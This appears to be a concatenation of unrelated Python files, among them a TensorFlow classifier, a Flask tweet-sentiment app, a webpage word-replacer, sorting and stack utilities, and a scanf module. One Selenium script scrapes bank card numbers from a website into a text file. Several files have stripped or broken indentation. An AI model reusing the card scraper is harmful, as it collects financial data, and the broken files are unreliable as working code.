train = ds.DataSet('D:/bdr/Documents/TP 3 tensor flow/Deep_Learning_Cours/Deep_Learning_Cours/DataBases/data_10k.bin','D:/bdr/Documents/TP 3 tensor flow/Deep_Learning_Cours/Deep_Learning_Cours/DataBases/gender_10k.bin',10000)
#train = ds.DataSet('../DataBases/data_100k.bin','../DataBases/gender_100k.bin',100000)
test = ds.DataSet('D:/bdr/Documents/TP 3 tensor flow/Deep_Learning_Cours/Deep_Learning_Cours/DataBases/data_test10k.bin','D:/bdr/Documents/TP 3 tensor flow/Deep_Learning_Cours/Deep_Learning_Cours/DataBases/gender_test10k.bin',10000)
# Graph inputs: flattened image x, one-hot gender label, training-mode flag.
with tf.name_scope('input'):
    x = tf.placeholder(tf.float32, [None, train.dim],name='x')
    y_desired = tf.placeholder(tf.float32, [None, 2],name='y_desired')
    ITM = tf.placeholder("bool", name='Is_Training_Mode')
# ConvNet: 4 stages of (2 conv layers + maxpool), doubling the filter count
# each stage (3 -> 6 -> 12 -> 24) on 48x48x1 inputs.
with tf.name_scope('CNN'):
    t = Layers.unflat(x,48,48,1)
    nbfilter = 3
    for k in range(4):
        for i in range(2):
            t = Layers.conv(t,nbfilter,3,1,ITM,'conv_%d_%d'%(nbfilter,i),KeepProb_Dropout)
        t = Layers.maxpool(t,2,'pool')
        nbfilter *= 2
    # Flatten the final feature map and classify into the 2 output classes.
    t = Layers.flat(t)
    #t = Layers.fc(t,50,ITM,'fc_1',KeepProb_Dropout)
    y = Layers.fc(t,2,ITM,'fc_2',KP_dropout=1.0,act=tf.nn.log_softmax)
# Cross-entropy from the log-softmax outputs: -mean(y_desired * log p).
with tf.name_scope('cross_entropy'):
    diff = y_desired * y
    with tf.name_scope('total'):
        cross_entropy = -tf.reduce_mean(diff)
    tf.summary.scalar('cross entropy', cross_entropy)
with tf.name_scope('accuracy'):
    with tf.name_scope('correct_prediction'):
        correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_desired, 1))
    with tf.name_scope('accuracy'):
        accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    tf.summary.scalar('accuracy', accuracy)
# Exponentially decaying learning rate: x0.75 every 1000 steps from 1e-3.
with tf.name_scope('learning_rate'):
    global_step = tf.Variable(0, trainable=False)
    learning_rate = tf.train.exponential_decay(1e-3,global_step,1000, 0.75, staircase=True)
# NOTE(review): this second 'learning_rate' scope is redundant (TF will
# uniquify it) but harmless.
with tf.name_scope('learning_rate'):
    tf.summary.scalar('learning_rate', learning_rate)
#train_step = tf.train.GradientDescentOptimizer(0.00001).minimize(cross_entropy)
train_step = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy,global_step=global_step)
merged = tf.summary.merge_all()
# Placeholders used only to feed the periodic mean-accuracy summaries below.
Acc_Train = tf.placeholder("float", name='Acc_Train');
Acc_Test = tf.placeholder("float", name='Acc_Test');
MeanAcc_summary = tf.summary.merge([tf.summary.scalar('Acc_Train', Acc_Train),tf.summary.scalar('Acc_Test', Acc_Test)])
print ("-----------",experiment_name)
print ("-----------------------------------------------------")
print ("-----------------------------------------------------")
sess = tf.Session()
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(experiment_name, sess.graph)
saver = tf.train.Saver()
if LoadModel:
    saver.restore(sess, "./model.ckpt")
# Training loop: log train metrics every 10 steps and mean accuracies
# (train + test) every 100 steps, offset by 50 steps.
nbIt = 5000
for it in range(nbIt):
    trainDict = get_dict(train,IsTrainingMode=True)
    sess.run(train_step, feed_dict=trainDict)
    if it%10 == 0:
        acc,ce,lr = sess.run([accuracy,cross_entropy,learning_rate], feed_dict=trainDict)
        print ("it= %6d - rate= %f - cross_entropy= %f - acc= %f" % (it,lr,ce,acc ))
        summary_merged = sess.run(merged, feed_dict=trainDict)
        writer.add_summary(summary_merged, it)
    if it%100 == 50:
        Acc_Train_value = train.mean_accuracy(sess,accuracy,x,y_desired,ITM)
        Acc_Test_value = test.mean_accuracy(sess,accuracy,x,y_desired,ITM)
        print ("mean accuracy train = %f test = %f" % (Acc_Train_value,Acc_Test_value ))
        summary_acc = sess.run(MeanAcc_summary, feed_dict={Acc_Train:Acc_Train_value,Acc_Test:Acc_Test_value})
        writer.add_summary(summary_acc, it)
writer.close()
if not LoadModel:
    saver.save(sess, "./model.ckpt")
sess.close()
|
from pprint import pprint, pformat
import logging
from logging.config import dictConfig
import colorlog
from colorlog import ColoredFormatter
# cf : https://stackoverflow.com/questions/17668633/what-is-the-point-of-setlevel-in-a-python-logging-handler
### create a formatter for future logger
### create a formatter for future logger
formatter = ColoredFormatter(
    "%(log_color)s%(levelname)1.1s ::: %(name)s %(asctime)s ::: %(module)s:%(lineno)d -in- %(funcName)s ::: %(reset)s %(white)s%(message)s",
    datefmt='%y-%m-%d %H:%M:%S',
    reset=True,
    log_colors={
        'DEBUG': 'cyan',
        'INFO': 'green',
        'WARNING': 'yellow',
        'ERROR': 'red',
        'CRITICAL': 'red,bg_white',
    },
    secondary_log_colors={},
    style='%'
)
### create console handler
handler = colorlog.StreamHandler()
handler.setFormatter(formatter)
### create logger
log = colorlog.getLogger("log")
log.addHandler(handler)
### set logging level (handlers filter further individually)
log.setLevel(logging.DEBUG)
# logging.handlers is a submodule and is NOT guaranteed to be bound by a
# plain "import logging"; the original only worked because logging.config
# happens to import it. Import it explicitly.
import logging.handlers
# File handler for INFO-and-above messages.
# NOTE(review): the 'logs/' directory must already exist; RotatingFileHandler
# raises on creation otherwise.
log_file_I = logging.handlers.RotatingFileHandler('logs/info_logs.log')
log_file_I.setFormatter(formatter)
log_file_I.setLevel(logging.INFO)
log.addHandler(log_file_I)
# File handler for the warnings log.
# Fix: this handler was set to INFO, making warning_logs.log a duplicate of
# the info log; WARNING matches the file's stated purpose.
log_file_W = logging.handlers.RotatingFileHandler('logs/warning_logs.log')
log_file_W.setFormatter(formatter)
log_file_W.setLevel(logging.WARNING)
log.addHandler(log_file_W)
|
"""
Implementation of Shell sort sorting technique
"""
def shell_sort(arr):
    """Sort ``arr`` in place with Shell sort and return it.

    Uses the simple gap sequence n//2, n//4, ..., 1; each pass is a
    gap-insertion sort.

    Bug fixed: the inner-loop comparison was ``arr[j - gap] > arr[j]``, but
    after the first shift ``arr[j]`` no longer holds the element being
    inserted, so a pass could stop early and leave the list unsorted
    (e.g. [2, 3, 1] came back as [2, 1, 3]). The comparison must be made
    against the saved element ``temp``.
    """
    n = len(arr)
    gap = n // 2
    while gap > 0:
        for i in range(gap, n):
            temp = arr[i]  # element being inserted into its gap-slice
            j = i
            # Shift larger elements of the gap-slice right until temp fits.
            while j >= gap and arr[j - gap] > temp:
                arr[j] = arr[j - gap]
                j -= gap
            arr[j] = temp
        gap //= 2
    return arr
# Simple CLI driver: read whitespace-separated integers, sort, display.
array = list(map(int, input('Enter array elements: ').strip().split()))
print('Given array: ', array)
print('Sorted array: ', shell_sort(array))
# Final input() keeps the console window open until the user presses Enter.
input()
|
#!/usr/bin/env python
#Author: Tyler Fornes
#Filename: switcheroo.py
#Function: Clones specified webpage to local copy and replaces a specified word with a given replacement
import sys
import urllib2
def getter():
    """Download and return the raw HTML of the URL given as argv[1]."""
    page = urllib2.urlopen(sys.argv[1])
    return page.read()
def reader():
    """Return the full contents of the local page copy, lol.html.

    Improvements: use a context manager so the handle is closed even if the
    read raises, and stop shadowing the builtin name ``file``.
    """
    with open('lol.html', 'r') as handle:
        return handle.read()
def replacer(html):
    """Return html with every occurrence of argv[2] replaced by argv[3]."""
    target, replacement = sys.argv[2], sys.argv[3]
    return html.replace(target, replacement)
def writer(text):
    """Overwrite lol.html with ``text``.

    Improvements: use a context manager so the handle is flushed and closed
    even on error, and stop shadowing the builtin name ``file``.
    """
    with open("lol.html", "w") as handle:
        handle.write(text)
def main():
    """Clone the page given on the command line, then swap the target word.

    Usage: switcheroo.py <url> <word> <replacement>
    """
    #grabs copy of webpage specified by user
    html_text = getter()
    #writes html text to file lol.html
    writer(html_text)
    #reads in text from lol.html
    copy_html = reader()
    #sends text to be processed for word replacement
    lol_html = replacer(copy_html)
    #writes replaced text to lol.html
    writer(lol_html)
if __name__ == "__main__":
main()
|
from django.shortcuts import render, render_to_response
from versiontools.osutils import AssemblyInfoFinder
from django.template.context import RequestContext
# Create your views here.
def show_assemblyinfo(request):
    """Scan a hard-coded solution directory for AssemblyInfo files and render the list."""
    finder = AssemblyInfoFinder()
    # NOTE(review): absolute local path — presumably a development-only setting.
    directory_to_scan =r'C:\Users\lberrocal\Documents\Visual Studio 2010\Projects\vessel_scheling_app'
    finder.find(directory_to_scan)
    context = RequestContext(request)
    context_dict = {
        'assembly_info_list': finder.assembly_info_list,
        'scanned_directory': directory_to_scan,
        'dlen': 30,
    }
    return render_to_response('versiontools/assembly-info-list.html', context_dict, context)
|
from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
from KratosMultiphysics import IsDistributedRun
from KratosMultiphysics.FluidDynamicsApplication.adjoint_fluid_analysis import AdjointFluidAnalysis
# Periodic adjoint analysis is only implemented for serial (non-MPI) runs;
# fail fast on distributed runs, otherwise pull in the no-replace solver.
if (IsDistributedRun()):
    raise Exception("Distributed runs are not yet supported with periodic adjoint analysis")
else:
    from KratosMultiphysics.RANSApplication.adjoint_fluid_solver_no_replace import AdjointFluidSolverNoReplace as adjoint_fluid_solver_no_replace
class PeriodicAdjointFluidAnalysis(AdjointFluidAnalysis):
    """Adjoint fluid analysis whose solver preserves periodic conditions (no element replacement)."""
    def _CreateSolver(self):
        # Hand the solver the model plus its settings block from the project parameters.
        return adjoint_fluid_solver_no_replace(self.model, self.project_parameters["solver_settings"])
|
import os
import pandas as pd
import numpy as np
import pprint
import re
import tweepy
from tweepy import OAuthHandler
from textblob import TextBlob
import json
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine
from flask import Flask, jsonify, render_template
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
#################################################
# Database Setup
#################################################
#app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL', '') or "sqlite:///db/bellybutton.sqlite"
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///db/project2db.sqlite"
db = SQLAlchemy(app)
# Reflect the existing SQLite database into automapped model classes.
Base = automap_base()
# reflect the tables
Base.prepare(db.engine, reflect=True)
# References to each reflected table holding tweet data.
Articles = Base.classes.articles1
Tweets = Base.classes.tweets1
Tweets_loc = Base.classes.tweets_loc1
Sentiment = Base.classes.sentiment1
# Tables with Bitcoin, Gold and S&P index price quotes.
BTC_Quotes = Base.classes.BTC_Quotes1
GLD_Quotes = Base.classes.GLD_Quotes1
SPX_Quotes = Base.classes.SPX_Quotes1
# Table with coordinates for world countries.
country_coordinate = Base.classes.country_coordinate1
@app.route("/")
def index():
"""Return the homepage."""
# return render_template("index1.html")
return render_template("sentimenttweet.html")
#Route to present World Heat Map where tweets occurred is rendered
@app.route("/tweetmap")
def tweetmap():
return render_template("maptweets.html")
#
@app.route("/tweetsloc")
def tweetsloc():
"""Return a list with location for tweets and sentiment values"""
# Use Pandas to perform the sql query
stmt = db.session.query(Tweets_loc).statement
df = pd.read_sql_query(stmt, db.session.bind)
latitude = list(df['latitude'])
longitude = list(df['longitude'])
locations = []
for i in range(0, len(latitude)):
locations.append([latitude[i], longitude[i]])
# Return a dictionary with tweets location and sentiment
return jsonify(locations)
#Get the number of positive, negative and neutral tweets read
@app.route("/tweetsent")
def tweetssent():
"""Return a dictionary with split of tweets by type of sentiment (positive, negative & neutral)"""
# Use Pandas to perform the sql query
stmt = db.session.query(Sentiment).statement
df = pd.read_sql_query(stmt, db.session.bind)
sentiment = {
"positive" : list(df["positive"]),
"negative" : list(df["negative"]),
"neutral" : list(df["neutral"])
}
# Return a dictionary with sentiment split
return jsonify(sentiment)
#Read tweets live - what people are tweeting about BITCOIN now
@app.route("/readtweets")
def readtweets():
"""Read tweets live"""
# Load twitter credentials from json file
with open("twitter_credentials.json", "r") as file:
creds = json.load(file)
class TwitterClient(object):
#Generic Twitter Class for sentiment analysis.
def __init__(self):
#Class constructor or initialization method.
# keys and tokens from the Twitter Dev Console
consumer_key = creds['CONSUMER_KEY']
consumer_secret = creds['CONSUMER_SECRET']
access_token = creds['ACCESS_TOKEN']
access_token_secret = creds['ACCESS_SECRET']
# attempt authentication
try:
# create OAuthHandler object
self.auth = OAuthHandler(consumer_key, consumer_secret)
# set access token and secret
self.auth.set_access_token(access_token, access_token_secret)
# create tweepy API object to fetch tweets
self.api = tweepy.API(self.auth)
except:
print("Error: Authentication Failed")
def clean_tweet(self, tweet):
#Utility function to clean tweet text by removing links, special characters
# using simple regex statements.
return ' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet).split())
def get_tweet_sentiment(self, tweet):
#Utility function to classify sentiment of passed tweet
# using textblob's sentiment method
# create TextBlob object of passed tweet text
analysis = TextBlob(self.clean_tweet(tweet))
# set sentiment
if analysis.sentiment.polarity > 0:
return 'positive'
elif analysis.sentiment.polarity == 0:
return 'neutral'
else:
return 'negative'
#Get 10 tweets at the time to avoid getting error
def get_tweets(self, query, count = 10):
#Main function to fetch tweets and parse them.
# empty list to store parsed tweets
tweets = []
try:
# call twitter api to fetch tweets
fetched_tweets = self.api.search(q = query, count = count, since="2017-04-03")
# parsing tweets one by one
for tweet in fetched_tweets:
# empty dictionary to store required params of a tweet
parsed_tweet = {}
# saving text of tweet
parsed_tweet['text'] = tweet.text
# saving sentiment of tweet
parsed_tweet['sentiment'] = self.get_tweet_sentiment(tweet.text)
# appending parsed tweet to tweets list
if tweet.retweet_count > 0:
# if tweet has retweets, ensure that it is appended only once
if parsed_tweet not in tweets:
tweets.append(parsed_tweet)
else:
tweets.append(parsed_tweet)
# return parsed tweets
return tweets
except tweepy.TweepError as e:
# print error (if any)
print("Error : " + str(e))
# creating object of TwitterClient Class
api = TwitterClient()
# calling function to get tweets
topic = 'Bitcoin'
tweets = api.get_tweets(query = topic, count = 200)
# picking positive tweets from tweets
ptweets = [tweet for tweet in tweets if tweet['sentiment'] == 'positive']
# percentage of positive tweets
pptweets = 100*len(ptweets)/len(tweets)
# picking negative tweets from tweets
ntweets = [tweet for tweet in tweets if tweet['sentiment'] == 'negative']
neutweets = [tweet for tweet in tweets if tweet['sentiment'] == 'neutral']
# percentage of negative tweets
pntweets = 100*len(ntweets)/len(tweets)
# percentage of neutral tweets
pneutral = 100 * (len(tweets) - len(ntweets) - len(ptweets))/len(tweets)
tsentiment = {
'negative' : pntweets,
'positve' : pptweets,
'neutral' : pneutral}
nsentiment = {
'negative' : len(ntweets),
'positve' : len(ptweets),
'neutral' : len(tweets) - len(ptweets) - len(ntweets)
}
tweetsdict = {
'psentiment': tsentiment,
'nsentiment' : nsentiment,
'positive': ptweets,
'negative': ntweets,
'neutral' : neutweets,
'all': tweets
}
# Return a list of the column names (sample names)
return jsonify(tweetsdict)
#return jsonify(nsentiment)
if __name__ == "__main__":
app.run()
|
import os
import torch
import random
import argparse
import numpy as np
from tqdm import tqdm
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from dataset import add_args_to_string
from training_VAE import VarAutoencoder
from dataset import DoubleMnistDataset, AddGaussianNoise, AddOcclusion
# Constants
ENCODED_SPACE_DIM=6  # default latent-space dimensionality
# Define paths
data_root_dir = '../datasets'
out_path = 'datasets/'
plots_dir = 'plots/'
params_dir = 'params/'
# Parse arguments
parser = argparse.ArgumentParser(description='Analyze the latent space.')
parser.add_argument('--add_noise', type=float, default=0, help='Variance of Gaussian noise added over the input image' )
parser.add_argument('--add_occlusion', type=int, default=0, help='Number of occluded rows over the input image')
parser.add_argument('--encoded_dim', type=int, default=ENCODED_SPACE_DIM, help='Encoded space dimension')
# parse input arguments
args = parser.parse_args()
# Initialize the VarAutoencoder object
net = VarAutoencoder(encoded_space_dim=args.encoded_dim)
# Select device
device_name = 'cuda' if torch.cuda.is_available() else 'cpu'
device = torch.device(device_name)
print('Using device:', device)
# Load network parameters trained for this latent dimension.
net.load_state_dict(torch.load(params_dir+'net_params_{}.pth'.format(args.encoded_dim), map_location=device_name))
# Move all the network parameters to the selected device
net.to(device)
# Load the pickled test dataset matching the noise/occlusion arguments.
with open(out_path+add_args_to_string('test', args, ["encoded_dim"])+'.pth', 'rb') as in_file:
    test_dataset = torch.load(in_file)
# Get the encoded representation of the test samples.
# NOTE(review): assumes each sample is ((image, label), ...) — confirm
# against the DoubleMnistDataset layout.
encoded_samples = []
for sample in tqdm(test_dataset):
    img = sample[0][0].unsqueeze(0).to(device)
    label = sample[0][1]
    # Encode image (sample from the posterior produced by the encoder).
    net.eval()
    with torch.no_grad():
        encoded_img = net.sample(*net.encode(img))
    # Append to list
    encoded_samples.append((encoded_img.flatten().cpu().numpy(), label))
# Visualize encoded space: one colour per digit class.
color_map = {
    0: '#1f77b4',
    1: '#ff7f0e',
    2: '#2ca02c',
    3: '#d62728',
    4: '#9467bd',
    5: '#8c564b',
    6: '#e377c2',
    7: '#7f7f7f',
    8: '#bcbd22',
    9: '#17becf'
}
# Randomly sample 1k points to plot
# encoded_samples_reduced = random.sample(encoded_samples, 1000)
# Stack all encoded vectors into a (n_samples, encoded_dim) array.
encoded_samples_np = np.vstack([x[0] for x in encoded_samples])
print("Original shape: ", encoded_samples_np.shape)
# Reduce dimensionality with Principal Components Analysis when the latent
# space has more than 2 dimensions; otherwise plot it directly.
if args.encoded_dim > 2:
    pca = PCA(n_components=2)
    principalComponents = pca.fit_transform(encoded_samples_np)
    print("Compressed shape: ", principalComponents.shape)
else:
    principalComponents = encoded_samples_np
plt.figure(figsize=(8,6))
for i in tqdm(range(principalComponents.shape[0])):
    label = encoded_samples[i][1]
    components = principalComponents[i]
    plt.plot(components[0], components[1], marker='.', color=color_map[label])
plt.grid(True)
# Build a manual legend: one coloured marker per digit class.
legend = [plt.Line2D([0], [0], ls='', marker='.', color=c, label=l) for l, c in color_map.items()]
plt.legend(legend, color_map.keys(), loc='lower center', bbox_to_anchor=(0.5, 1), ncol=5, fontsize=12, frameon=False)
plt.tight_layout()
plt.savefig(plots_dir+add_args_to_string("PCA_", args)+".png", transparent=True, dpi=300)
plt.show()
# For a 2-D latent space: walk a straight line between two hand-picked
# latent points and decode each step to visualize the interpolation.
if args.encoded_dim == 2:
    n_images = 12
    # Two points in the encoded space corresponding to digits
    start = np.array([10, -15])
    stop = np.array([0, 10])
    # Generate samples
    line = np.linspace(start, stop, n_images)
    encoded_value_list = [torch.tensor(x).float().unsqueeze(0).to(device) for x in line]
    # Generate corresponding images
    net.eval()
    new_img_list = []
    with torch.no_grad():
        for encoded_value in encoded_value_list:
            new_img_list.append(net.decode(encoded_value))
    # Plot results
    fig, axs = plt.subplots(2, 6, figsize=(18,6))
    for i, ax in enumerate(axs.flatten()):
        ax.imshow(new_img_list[i].squeeze().cpu().numpy(), cmap='gist_gray')
        ax.set_xticks([])
        ax.set_yticks([])
    plt.tight_layout()
    plt.savefig(plots_dir+"generated_digits.png", transparent=True, dpi=300)
    plt.show()
|
# ***corey pandas***
import json
# Load the two JSON documents whose structure will be compared.
with open ('s3.json') as f:
    new_string = json.load(f)
with open('claims2.json') as f2:
    new_string2 = json.load(f2)
# for new_list in new_strig:
#     print(new_list)
# print(new_strig)
def sorting(item):
    """Return a canonical, order-insensitive representation of a JSON value.

    Dicts become sorted lists of (key, canonical-value) tuples, lists are
    recursively canonicalized and sorted, scalars pass through unchanged —
    so two structurally equal documents compare equal regardless of key or
    element order.
    """
    if isinstance(item, dict):
        return sorted((key, sorting(value)) for key, value in item.items())
    if isinstance(item, list):
        return sorted(sorting(element) for element in item)
    return item
# Compare the two documents irrespective of key/element ordering.
print(sorting(new_string) == sorting(new_string2))
# TODO: extract the parquet schema and compare it against the JSON
# (this is the JSON-to-parquet conversion check) (statuses)
# TODO: take a parquet schema as input and print that schema
# TODO: warranty contract — all three tables, plus claims
# print(sorting(new_string) == sorting(json2_dict))
# Programming Exercise 5-12
#
# Program to find the greater of two integers.
# This program accepts two integers,
# passes them to a function that compares them,
# and displays which one is greater.
# define the main function
def main():
    """Prompt for two integers and report which is greater (or that they are equal)."""
    # Entry widom: prompts must stay byte-identical to the original UI.
    first = int(input("Enter the first int: "))
    second = int(input("Enter second int: "))
    if first == second:
        print("Both are equal")
    else:
        # Delegate the comparison to greater() and show the winner.
        print(greater(first, second), " is greater")
# Define a function to compare integer values.
# This function accepts two integer parameters,
# compares them,
# and returns the value of the greater.
def greater(int_1, int_2):
    """Return the larger of two integers, or a message string if they are equal."""
    if int_1 == int_2:
        return ("both numbers are equal")
    # Conditional expression replaces the original if/elif chain.
    return int_1 if int_1 > int_2 else int_2
# Call the main function to start the program, but only when executed as a
# script — guarding the call lets the module be imported without prompting.
if __name__ == "__main__":
    main()
|
#!/usr/bin/env python
# coding=utf-8
'''
@author: Zuber
@date: 2019/8/8 9:38
'''
import os
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
def open_bank_url():
    """Attach to a remote-debugging Chrome session and scrape bank-card data.

    Launches Chrome with remote debugging enabled, walks the bank table on
    jlshare.top, and appends each (sub-bank, card) row to banknumbers.txt.

    Fix: the output file was opened inside the innermost loop — one handle
    per card row, none of them ever closed. It is now opened once with a
    context manager. Also removed the unused local ``bankcard``.
    """
    os.system(
        'start chrome.exe --remote-debugging-port=9222 --user-data-dir="F:\selenum\AutomationProfile"')
    options = Options()
    options.add_experimental_option("debuggerAddress", "127.0.0.1:9222")  # port configured above
    driver = webdriver.Chrome(
        executable_path=r'./chromedriver.exe',
        options=options)
    # driver.implicitly_wait(2)
    wait = WebDriverWait(driver, 10)
    try:
        driver.get('https://www.jlshare.top/bankCard')
        # driver.maximize_window()
        wait.until(
            EC.presence_of_element_located((By.ID, 'banck')))
        trs = driver.find_elements_by_xpath("//table[@id='banck']/tbody/tr")
        with open("banknumbers.txt", 'a') as f:  # scraped card data accumulates here
            for i in trs:
                i.click()
                print(i.text)
                subtrs = i.find_elements_by_xpath("//table[@id='subbanck']/tbody/tr")
                for sub in subtrs:
                    sub.click()
                    print(sub.text)
                    cardNoList = i.find_elements_by_xpath("//table[@id='cardNoList']/tr")
                    for card in cardNoList:
                        print(sub.text, card.text, file=f)
                        print(sub.text, card.text)
        # driver.quit()
    except Exception as e:
        print(f"{e}")
if __name__ == '__main__':
    open_bank_url()
|
# This file contains the stack ADT
from collections import deque


class Stack:
    """LIFO stack backed by a collections.deque.

    Fix: the original declared ``stack = deque()`` as a *class* attribute,
    so every Stack instance shared one deque. The storage now lives on
    each instance.
    """

    def __init__(self):
        # Per-instance storage; deque gives O(1) append/pop at the right end.
        self.stack = deque()

    def pushStack(self, newElement):
        """Push newElement onto the top of the stack."""
        self.stack.append(newElement)
        return

    def popStack(self):
        """Pop and return the top element.

        Returns (errorFlag, value): (False, element) on success; on an
        empty stack, (True, <empty deque>) — preserved for caller
        compatibility.
        """
        if len(self.stack) == 0:
            return True, self.stack
        return False, self.stack.pop()

    def isEmpty(self):
        """Return True when the stack holds no elements."""
        return len(self.stack) == 0

    def numElements(self):
        """Return the number of elements currently on the stack."""
        return len(self.stack)

    def peekStack(self):
        """Return the top element without removing it.

        NOTE: preserves the original quirk of returning False for an empty
        stack, so callers cannot distinguish emptiness from a stored False.
        """
        if len(self.stack) == 0:
            return False
        # The 'top' of the stack is the right end of the deque.
        return self.stack[-1]
|
from tkinter import *
from PIL import ImageTk, Image
from json import *
# UI constants (e.g. image paths) from the project's JSON config.
# Fix: the original passed open(...) straight to load() and never closed
# the handle; the context manager closes it promptly.
with open('utils/constants.json') as _constants_file:
    constants = load(_constants_file)
# Default background colour for every widget in the app.
DEFAULT_COLOR = 'AntiqueWhite1'
class Application():
    """Tk schedule window: heading, separator line and the Yui avatar image."""
    def __init__(self, parent):
        # parent is the root Tk window this application decorates.
        self.parent = parent
        self.load_images()
        self.load_hud()
        # Heading label ("Schedule" in Japanese).
        self.label01 = Label(text='スケジュール', bg=DEFAULT_COLOR)
        self.label01.config(font=('MS Gothic', 44))
        self.label01.pack(side=TOP)
        # Horizontal separator drawn with a run of underscores.
        self.label02 = Label(text='______________________________________________________________',
                                bg=DEFAULT_COLOR)
        self.label02.config(font=('MS Gothic', 44))
        self.label02.place(relx=-0.1, rely=0.2)
    def load_hud(self):
        """Size/position the main window and set its background colour."""
        self.parent.geometry('450x900+600+0')
        self.parent['bg'] = DEFAULT_COLOR
    def load_images(self):
        """Load the avatar image from the configured path and place it."""
        self.yuiImage = ImageTk.PhotoImage(Image.open(constants['Yui']).resize((160, 160), Image.ANTIALIAS))
        self.yuiImageLabel = Label(image=self.yuiImage, height=150,width=150,bg=DEFAULT_COLOR)
        # Keep a reference on the widget so Tk's image is not garbage-collected.
        self.yuiImageLabel.image = self.yuiImage
        self.yuiImageLabel.place(relx=0.3, rely=0.5)
# Build the main window, attach the application and enter the Tk event loop.
root = Tk()
Application(root)
root.mainloop()
|
"""scanf.py: scanf-style input for Python.
Danny Yoo (dyoo@hkn.eecs.berkeley.edu)
The initial motivation for this module was based on a posting on
Python-tutor:
http://mail.python.org/pipermail/tutor/2004-July/030480.html
I haven't been able to find a nice module to do scanf-style input.
Even the Library Reference recommends regular expressions as a
substitute:
http://docs.python.org/lib/node109.html
But there appears to have been activity about this on python-list:
http://aspn.activestate.com/ASPN/Mail/Message/python-list/785450
Still, let's see if we can get a close equivalent scanf() in place.
At the least, it'll be fun for me, and it might be useful for people
who are still recovering from C. *grin*
Functions provided:
scanf(formatString) -- formatted scanning across stdin
sscanf(sourceString, formatString) -- formatted scanning across strings
fscanf(sourceFile, formatString) -- formatted scanning across files
The behavior of this scanf() will be slightly different from that
defined in C, because, in truth, I'm a little lazy, and am not quite
sure if people will need all of scanf's features in typical Python
programming.
But let's first show what conversions this scanf() will support.
Format strings are of the following form:
% [*] [width] [format]
where [*] and [width] are optional, and [format] is mandatory. The
optional flags modify the format.
* suppresses variable capture.
width maximum character width.
We support the following scanf conversion formats (copied from K&R):
d decimal integer.
i integer. The integer may be in octal (leading zero) or
hexadecimal (leading 0x or 0X). ## fixme
o octal integer (with or without leading zero). ## fixme
x hexadecimal integer (with or without leading 0x or 0X) ## fixme
c characters. The next input characters (default 1) are
placed at the indicated spot. The normal skip over white space
is suppressed; to read the next non-white space character, use
%1s.
s character string (not quoted).
f floating-point number with optional sign and optional decimal point.
% literal %; no assignment is made.
Literal characters can appear in the scanf format string: they must
match the same characters in the input.
There is no guarantee of what happens if calls to scanf are mixed with
other input functions. See the BUGS section below for details on this.
If the input doesn't conform to the format string, a FormatError is
raised.
Example format strings:
"%d %d" Two decimal integers.
"%d.%d.%d.%d" Four decimal integers, separated by literal periods.
The periods won't be captured.
"hello %s" Literally matches "hello" followed by any number of
spaces, followed by a captured word.
There's also an interface for calling the internal function bscanf()
that works on CharacterBuffer types, if in the future there is
something that supports getc() and ungetc() natively. There's also an
undocumented compile() function that takes format strings and returns
a function that can scan through CharacterBuffers. Ooops, I guess I
just documented it. *grin*
######################################################################
BUGS and GOTCHAS:
One major problem that I'm running into is a lack of ungetc(); it
would be nice if there were such a function in Python, but I can't
find it. I have to simulate it by using a CharacterBuffer object, but
it's not an ideal solution.
So at most, you may lose a single character to the internal buffers
maintained by this module if you use scanf(). The other two *scanf()
functions, thankfully, aren't affected by this problem, since I can
simulate ungetc() more accurately by using seek() in the other two
cases.
If you really need to get that buffered character back, you can grab
it through _STDIN.lastChar, though manually fiddling with this is not
recommended.
So use scanf() with the following caveat: unlike C's stdin(), this
version scanf() can't be interchanged with calls to other input
functions without some kind of weird side effect. We keep a
one-character buffer into stdin, so at most you might lose one
character to the internal buffers.
fscanf() is only allowed to work on things that support both read(1)
and seek(1, -1), since then I can reliably do a ungetch-like thing.
scanf("%s") can be dangerous in a hostile environment, since it's very
possible for something to pass in a huge string without spaces. So use
an explicit width instead if you can help it."""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import next
from builtins import object
import sys
from string import whitespace as WHITESPACE
from string import digits as DIGITS
__all__ = ['scanf', 'sscanf', 'fscanf']
__version__ = '1.0'
class CharacterBuffer(object):
    """Abstract one-character-lookahead buffer.

    Subclasses supply getch()/ungetch(); the scanning helpers below are
    written purely in terms of those two primitives.
    """
    def getch(self):
        """Return the next character, or the empty string at end of input."""
        pass # implement me!
    def ungetch(self, ch):
        """Push one character back; valid at most once between getch() calls."""
        pass # implement me!
    def scanCharacterSet(self, characterSet, maxChars=0):
        """Consume and return characters while they belong to characterSet."""
        return self.scanPredicate(lambda ch: ch in characterSet, maxChars)
    def scanPredicate(self, predicate, maxChars=0):
        """Consume and return characters while predicate(ch) holds.

        Stops at end of input, at the first non-matching character (which
        is pushed back), or after maxChars characters (0 = unlimited).
        """
        collected = []
        while maxChars == 0 or len(collected) < maxChars:
            ch = self.getch()
            if ch == '' or not predicate(ch):
                # Non-matching character (or the EOF sentinel) goes back.
                self.ungetch(ch)
                break
            collected.append(ch)
        return ''.join(collected)
class CharacterBufferFromIterable(CharacterBuffer):
    """CharacterBuffer over any iterable of characters. A one-slot
    'lastChar' attribute simulates ungetc()."""

    def __init__(self, iterable):
        self.iterator = iter(iterable)
        self.lastChar = ''  # holds the pushed-back character, if any

    def getch(self):
        # Serve the pushed-back character first, then the iterator.
        if self.lastChar != '':
            ch = self.lastChar
            self.lastChar = ''
            return ch
        try:
            return next(self.iterator)
        except StopIteration:
            return ''

    def ungetch(self, ch):
        self.lastChar = ch
